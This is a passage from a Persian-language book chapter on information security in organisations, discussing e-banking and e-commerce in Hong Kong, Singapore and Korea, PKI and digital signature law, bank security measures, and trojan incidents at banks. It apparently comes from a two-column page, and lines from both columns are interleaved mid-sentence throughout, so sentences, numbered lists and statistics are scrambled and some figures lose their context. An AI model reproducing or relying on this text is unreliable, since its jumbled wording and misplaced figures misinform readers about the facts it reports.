ﻧﻴﺰ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﻋﻤﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ .ﺍﻋﺘﻤﺎﺩ ﺑﻴﺶ ﺍﺯ ﺣـﺪ ﺑـﻪ ﻲ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﻴـﺰ
ﻳﺎ ﻧﺎﺗﻮﺍﻧﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘ ﹺ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺷﻤﻨﺪﻱ ﭼﻮﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻟﺰﻭﻣﹰﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻴﺎﻓﺰﺍﻳﻴﻢ ،ﺍﻳﻦ ﺩﺭﺻﺪ ﺑﺎﺯ ﻫﻢ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ
ﻳﺎﻓﺖ.
228 Forum of Incident Response and Security
Teams
)229 Internet Security Alliance (www.isalliance.org
٢١٧ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻫﻮﺷﻤﻨﺪ( .ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ﺍﺯ ﻫـﺮ ﺭﻣـﺰ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻤﻜـﻦ ﺣﻔﺎﻇـﺖ ﻧﻤـﻲﻛﻨـﺪ.
ﻋﺒﻮﺭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻳﻜﺒﺎﺭ ﻣﻲﺗﻮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ. ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ ﻭ
ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻄﻬﺎﻱ ﺑـﺎ ﻣﻌﻤـﺎﺭﻱ ﺑـﺎﺯ ﺗﻌﺮﻳـﻒ
ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ )ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘﺔ ﺯﻧﺠﻴﺮ ﺍﻣﻨﻴﺘـﻲ( ﺭﺍ ﺍﻓـﺰﺍﻳﺶ .۴
ﺷﺪﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭﺍﻗﻌﻲ ﻫﺮ ﻻﻳﻪ،
ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ ﺭﻭﺷـﻬﺎ ﻭ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﺮﺍﻱ
ﻧﻴﺎﺯ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻫﻨﮕﻔﺘﻲ ﻧﺪﺍﺭﺩ .ﺍﻳـﻦ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪ
ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺩﺭ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨـﺶ ﻛﺘـﺎﺏ ﺗﻮﺿـﻴﺢ ﺩﺍﺩﻩ
ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻦ ﺑﺎﺷﻨﺪ ،ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺷﺎﻣﻞ ﻧﺼﺐ ﺩﻳﻮﺍﺭﻩﻫـﺎﻱ
ﺷﺪﻩﺍﻧﺪ.
ﺁﺗﺶ ﺷﺨﺼﻲ ٢٣٠ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ
ﻧﻴﺰ ﻣﻲﺷﻮﺩ.
ﻧﻘﺶ ﻛﺸﻮﺭﻫﺎ
ﺭﻭﻳﺪﺍﺩﻫﺎ ﺑﺎﻳﺪ ﻣﺪﻳﺮﻳﺖ ﺷﺪﻩ ﻭ ﺑﺴﺮﻋﺖ ﮔﺰﺍﺭﺵ ﺷﻮﻧﺪ ﺗـﺎ .۵
ﻧﺴﺒﺖ ﺑﻪ ﻭﺍﻛﻨﺶ ﻣﻮﻓﻘﻴـﺖﺁﻣﻴـﺰ ﺗـﻴﻢ ﺍﻣﻨﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ ﻫﻨﮓﻛﻨﮓ
ﺣﺎﺻﻞ ﺷﻮﺩ.
ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﺍﺩﺍﺭﺓ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ ﻫﻨﮓﻛﻨﮓ ﺑـﺎ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﺳـﻪ
ﺩﺭ ﻫﻨﮓﻛﻨﮓ ،ﺩﻭﻟﺖ ﺑﺎ ﺑﺎﻧﻜﻬﺎ ﻭ ﭘﻠﻴﺲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺭﻭﻳـﺪﺍﺩﻫﺎ ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﻛﺮﺩﻧﺪ:
ﻭ ﺧﻄﺮﺍﺕ ﻫﻤﻜﺎﺭﻱ ﻣﻲ ﻛﻨﺪ ﻭ ﺑـﺎ ﺍﻋﻤـﺎﻝ ﻣـﺪﻳﺮﻳﺖ ﺍﺛـﺮﺑﺨﺶ،
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺩﺭﺁﻣﺪﻫﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺣـﺪﻭﺩ • ﺗﻐﻴﻴﺮﺍﺕ ﺣﺴﺎﺑﻬﺎﻱ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺍﻣﺮ .۱
۴۰ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺑﻮﺩ ﻭ ﺩﺭ ﺳـﺎﻝ ۲۰۰۱ﺑـﻪ ۹۱ﻣﻴﻠﻴـﻮﻥ ﺑﻪ ﻣﻌﻨﻲ ﻛﻨﺘﺮﻝ ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺍﻧﺘﻘﺎﻟﻬـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ
ﺩﻻﺭ ﺭﺳﻴﺪ. ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ.
ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺗﻌﺪﺍﺩ ۱۴,۰۰۰ﺧﺎﻧﻮﺍﺭ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎ • ﻣﻌﺎﻣﻼﺕ ﺑﺎﻧﻜﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ،ﻭ ﺩﺭ ﻣـﻮﺭﺩ .۲
ﺳﺮﻋﺖ ﺑﺎﻻ ﻣﺘﺼﻞ ﺑﻮﺩﻧﺪ ﻭ ﺍﻳﻦ ﺗﻌﺪﺍﺩ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﻪ ﻣﻌﺎﻣﻼﺕ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻣـﺸﻜﻮﻙ ﺑـﺎ ﺻـﺎﺣﺒﺎﻥ ﺣـﺴﺎﺑﻬﺎ
۷،۸ﻣﻴﻠﻴﻮﻥ ﻣﻌﺎﺩﻝ %۶۴ﺟﻤﻌﻴﺖ ﺭﺳﻴﺪ. ﻫﻤﺎﻫﻨﮕﻲ ﻣﺠﺪﺩ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ )ﺍﺯ ﻃﺮﻳﻖ ،SMSﻳﺎ ﺍﺯ ﻃﺮﻳـﻖ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(.
ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻣﺸﺘﺮﻱ ﺍﺯ ﻋﻮﺍﻣﻞ ﭼﻨﺪﮔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ .۳
ﻛﻨﻴﺪ )ﺑﺮ ﺍﺳﺎﺱ ﺍﺑﺰﺍﺭﻱ ﻛﻪ ﺗﻨﻬﺎ ﻣـﺸﺘﺮﻱ ﺁﻧـﺮﺍ ﺩﺍﺭﺩ؛ ﻣﺜـﻞ ﻛـﺎﺭﺕ
ﻧﻜﺮﺩ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﺩﺭ ﺳﺎﻝ ۱۹۹۸ﺗﻨﻬـﺎ ۳ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺟـﻮﺩ •
ﺁﺳﻴﺐ ﺩﻳﺪﻧﺪ ﻛﻪ ﻭﺻﻠﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﺍﻋﻤـﺎﻝ ﺩﺍﺷﺖ ،ﻛﻪ ﺍﻳﻦ ﺭﻗﻢ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺑﻪ ۲۴ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ
ﻧﺸﺪﻩ ﺑﻮﺩ .ﺟﺰﺋﻴﺎﺕ ﺍﻳﻦ ﺣﻤﻠﻪ ﺑﺪﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻓﺎﺵ )ﻧﻴﻤﻲ ﺍﺯ ﺟﻤﻌﻴﺖ ﻛﺮﻩ( ﺭﺳﻴﺪ.
ﻧﺸﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺣﺎﺩﺛﻪ ﻧﻴﺰ ﺑﺎﺭ ﺩﻳﮕﺮ ﻟـﺰﻭﻡ ﻫﻤﻜـﺎﺭﻱ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳﻴﺎﺭ ﺗﻮﺳـﻂ ﺑـﻴﺶ ﺍﺯ %۵۰ •
ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﮔﺬﺍﺷﺖ. ﺟﻤﻌﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ.
ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻄﻮﺭ ﻓﻌﺎﻝ ﺑﻪ ﻣﻮﺿﻮﻉ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﻼ ﺍﺛﺒﺎﺕ ﺷـﺪﻩ ﻋﻤﻮﻣﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻨﮕﺎﭘﻮﺭ ﻛﺎﻣ ﹰ
) (PKIﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ" .ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ" ﺳﻨﮕﺎﭘﻮﺭ )ﻣﺼﻮﺏ
ﺍﺳﺖ .ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺑـﺴﻴﺎﺭ ﻓﺮﺍﮔﻴـﺮ ﻭ
ﺳﺎﻝ (۱۹۹۹ﻣﺴﺌﻮﻟﻴﺖ PKIﺍﻳﻦ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺤﺒﻮﺏ ﻫﺴﺘﻨﺪ .ﻋﻠﻴﺮﻏﻢ ﺟﻤﻌﻴﺖ ﺍﻧﺪﻙ ۴ﻣﻴﻠﻴﻮﻧﻲ ،ﺗﻘﺮﻳﺒﹰﺎ %۲۵
ﻭ ﺍﻃﻼﻋﺎﺕ ﺳﭙﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﺔ PKIﻣﻠﻲ ﺍﻳﻦ ﻛﺸﻮﺭ ،ﻣﺮﺍﻛـﺰ ﺟﻤﻌﻴﺖ ﺍﺯ ﺧـﺪﻣﺎﺕ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻬـﺮﻩ ﻣـﻲﮔﻴﺮﻧـﺪ.
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ٢٣١ﻣﻌﺘﺒﺮ ﺭﺍ ﻣﻌﻴﻦ ﻣﻲﻛﻨﺪ. ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺻﻨﻌﺖ ﻧﻴـﺰ ﺑـﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﺍﺳـﺖ.
ﺍﻣﺎ ﺍﺯ ﮔﻮﺍﻫﻲ ﻧـﻮﻋﻲ ﺷـﻨﺎﺧﺖ ﺩﻭﺟﺎﻧﺒـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺳـﺎﺯﻣﺎﻥ ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳـﺎﻝ ۱۹۹۷ﺷـﺮﻭﻉ ﺷـﺪ ﻭ ﺍﻛﻨـﻮﻥ ﺣـﺪﻭﺩ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﺮﻩ ) ٢٣٢(KISAﺑﻴﺸﺘﺮ ﺑﺎ ﻣﻮﺿﻮﻋﺎﺕ ﺗﻜﻨﻴﻜـﻲ %۵۰ﻛﻞ ﻣﻌﺎﻣﻼﺕ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﺍﺩﻩ ﺍﺳـﺖ .ﺍﻣـﺎ ﺩﺭ
ﻣﺜﻞ ﻧﻈﺎﺭﺕ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ،ﺗـﺼﺪﻳﻖ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ ،ﻭ ﺍﻧﺠـﺎﻡ ﻧﻘﻄﺔ ﻣﻘﺎﺑﻞ ،ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑـﻪ ﺍﻳـﻦ ﺳـﺮﻋﺖ ﺩﺭﺣـﺎﻝ
ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪ ﺩﺭﺑﺎﺭﺓ PKIﺳﻴﻤﻲ ﻭ ﺑـﻲﺳـﻴﻢ ﺳـﺮ ﻭ ﻛـﺎﺭ ﺭﺷﺪ ﻧﻴﺴﺖ ،ﺍﮔﺮﭼﻪ ﻃﺒﻴﻌﺖ ﺁﻥ ﺍﻳﻨﻄﻮﺭ ﺍﻳﺠﺎﺏ ﻣﻲﻛﻨﺪ .ﺧـﺪﻣﺎﺕ
ﺩﺍﺭﺩ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷـﺶ ﻣﺮﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ ﻻ ﻧﻴﺎﺯ ﺑﻪ ﺑﻮﻣﻲﺳﺎﺯﻱ ﺩﺍﺭﻧﺪ ﻭ ﻛﻤﺘﺮ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ ﺑﻴﻤﻪ ﻣﻌﻤﻮ ﹰ
ﮔﻮﺍﻫﻲ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ .ﭼﻮﻥ ﮔﻮﺍﻫﻲﻫـﺎ ﺗﻮﺳـﻂ ﺗﻤـﺎﻡ ﻣﺮﺍﻛـﺰ ﻫﻤﻪﺟﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﻭ ﻛﺎﺭﺁﻱ ﺑﻴﻤﻪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ.
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻗﺎﺑﻞ ﺷﻨﺎﺳـﺎﻳﻲ ﻫـﺴﺘﻨﺪ ،ﻣـﺸﺘﺮﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺑﺎ ﻧﮕﺎﻩ ﺑﻪ ﺟﻨﺒﺔ ﺟﻨﺎﻳﻲ ﺍﻳﻦ ﺗﺤﻮﻻﺕ ،ﺁﻣﺎﺭﻫﺎ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻭﻗـﻮﻉ
ﻣﻌﺎﻣﻼﺕ ﻣﺨﺘﻠﻒ ﻳﻚ ﺍﻣﻀﺎﻱ ﻭﺍﺣﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ
ﺗﻘﺮﻳﺒﹰﺎ ۱۰۰ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ۱۹۹۶ﻭ ۱۹۹۷
ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤﺖ ﺣﻤﺎﻳﺖ ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ .ﺑﺎ ﻫﺴﺘﻨﺪ .ﺩﺭ ﺳﺎﻝ ۲۰۰۰ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻪ ﻋﺪﺩ ۵,۰۰۰ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ
ﺍﻳﻨﺤﺎﻝ ﭼﺎﻟﺸﻬﺎﻳﻲ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ،ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺣﺎﺿﺮ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﻋﺪﻱ ﺩﺭﺣـﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ .ﺍﮔﺮﭼـﻪ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻲﺷﻮﺩ .ﺍﻣﺎ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﻤﻮﻣﻴﺖ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﺩﻭ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﺧﻴﺮ
ﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺳﻄﻪﺍﻱ )ﺩﻻﻟﻬﺎ( ﺻﺎﺩﻕ ﻧﻴﺴﺖ :ﺍﺯ ۳۶ )ﻛﻪ ﺫﻳ ﹰﻼ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷـﺪﻩ( ﺑﺎﺭ ﺩﻳﮕﺮ ﺍﻫﻤﻴﺖ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ
ﻣﺆﺳﺴﺔ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺗﻨﻬﺎ ﭼﻬﺎﺭ ﻣﺆﺳـﺴﻪ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺭﻭﺷـﻦ
ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ .ﺩﻭ ﺩﻟﻴﻞ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺍﻳـﻦ ﺍﻣـﺮ ﺑـﺮ ﻣﻲﻛﻨﻨﺪ:
ﺷﻤﺮﺩ:
ﺩﺭ ﻳﻚ ﺭﺧﺪﺍﺩ ،ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺰﺭﮔﺘـﺮﻳﻦ ﺑﺎﻧـﻚ .۱
ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﺳـﺎﻝ - ۱۹۹۷ﺩﻭ ﺳـﺎﻝ ﭘـﻴﺶ ﺍﺯ .۱ ﺳﻨﮕﺎﭘﻮﺭﻱ ﺁﻟﻮﺩﻩ ﺑﻪ ﺍﻧﻮﺍﻋﻲ ﺍﺯ ﺗﺮﺍﻭﺍﻫﺎ ﺷﺪ .ﺍﻳـﻦ ﺗﺮﺍﻭﺍﻫـﺎ
ﺗﺼﻮﻳﺐ ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ -ﺷﺮﻭﻉ ﺷﺪ .ﻟـﺬﺍ ﺍﻳـﻦ
ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ
ﻛﺎﺭﺑﺮﺍﻥ ﻗﺒﻞ ﺍﺯ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ،
ﺑﺮﺍﻱ ﺁﺩﺭﺳﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺭﺳﺎﻝ ﻣـﻲﻛﺮﺩﻧـﺪ ﻭ
ﻣﺸﻜﻠﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ.
ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺳﺎﺭﻗﻴﻦ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﻣﻘﺎﺩﻳﺮ ﻋﻈﻴﻤﻲ ﭘﻮﻝ ﺑـﻪ
ﺳﺮﻗﺖ ﺑﺒﺮﻧﺪ .ﺍﻳﻦ ﺗﺮﺍﻭﺍﻱ ﺧﺎﺹ ﺁﻧﻘﺪﺭ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩ ﻛـﻪ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺩﺭ .۲
ﺍﺯ ﺿﺪﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺑﻬﺎ ﺑﻪ ﺳﻼﻣﺖ ﻋﺒﻮﺭ ﻣﻲﻛـﺮﺩ.
ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻳﻤﻦ ﺷﻮﺩ ،ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ
ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻣﻲﺗﻮﺍﻥ ﻧﺘﻴﺠﻪ ﮔﺮﻓﺖ ﻛـﻪ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ
ﺗﺠﺎﺭﺕ ﺩﭼﺎﺭ ﺗﺄﺧﻴﺮ ﻳﺎ ﮔﺮﻓﺘﺎﺭ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺷﻮﻧﺪ.
)ﺿﺪﻭﻳﺮﻭﺱ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ( ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺩﻓـﺎﻋﻲ
ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻳﻚ ﺣﺎﺩﺛﺔ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻛﺮﻩ ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺎﺷﻨﺪ.
ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺭﺍ ﺩﮔﺮﮔـﻮﻥ ﺳـﺎﺧﺖ .ﺩﺭ ﻣـﺎﻩ
ﺣﺎﺩﺛﺔ ﺩﻳﮕﺮ ﺩﺭ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ ﺭﻭﻱ ﺩﺍﺩ، .۲
ﺍﻣﺎ ﺗﻮﺟﻪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ
231 Certification Authorities
232 Korean Information Security Agency
٢١٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻲ ﻓﻬﻢ ﻭ ﻭﺍﻛﻨﺶ ﻣﺆﺛﺮ ﺑﻪ ﺣﻮﺍﺩﺙﻫﻤﭽﻨﻴﻦ ﻇﺮﻓﻴﺖ ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧ ﹺ ﺁﮔﻮﺳــﺖ ﺳــﺎﻝ ﮔﺬﺷــﺘﻪ ﭼﻨــﺪ ﺷــﺮﻛﺖ ﻭﺍﺳــﻄﻪﺍﻱ ﺣــﺴﺎﺑﻬﺎﻱ
ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑﻪ ﻣﻨﺼﺔ ﻇﻬﻮﺭ ﺭﺳـﺎﻧﺪ ﻭ ﺩﺭ ﻧﺘﻴﺠـﺔ ﻳـﻚ ﻏﻴﺮﻓﻌــﺎﻝ ﻭ ﻣــﺴﻜﻮﺗﻲ ﺭﺍ ﻳﺎﻓﺘﻨــﺪ ﻛــﻪ ﺗﻨﻬــﺎ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ
